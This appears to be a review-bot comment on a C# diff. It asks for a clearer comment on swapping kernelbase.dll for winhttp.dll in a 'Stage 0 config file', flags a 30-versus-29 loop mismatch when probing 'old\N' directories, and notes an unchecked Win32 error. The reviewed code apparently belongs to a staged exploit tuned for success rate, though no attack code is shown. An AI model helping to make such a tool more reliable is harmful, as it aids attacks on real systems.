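Review bot: The added comment `//replace kernelbase with winhttp` only restates the assignment on its line; the reason for the swap is the interesting part and is missing. The commit message credits this change with the C# success-rate improvement, so say that where the value is set, e.g. `// Stage 0 config file: winhttp.dll improved reliability over kernelbase.dll (see commit); kernelbase.dll is used again for the old\N retries below`. Separately, this port loops `for (int i = 1; i <= 30; i++)` while the Python port in the same commit uses `range(1, 30)`, so the two probe 30 and 29 `old\N` directories respectively — align them or document why they differ. The `Marshal.GetLastWin32Error()` value for Stage 0 is printed but not checked, so a failed first call still proceeds into the retry loop. The enclosing method begins before and ends after this hunk.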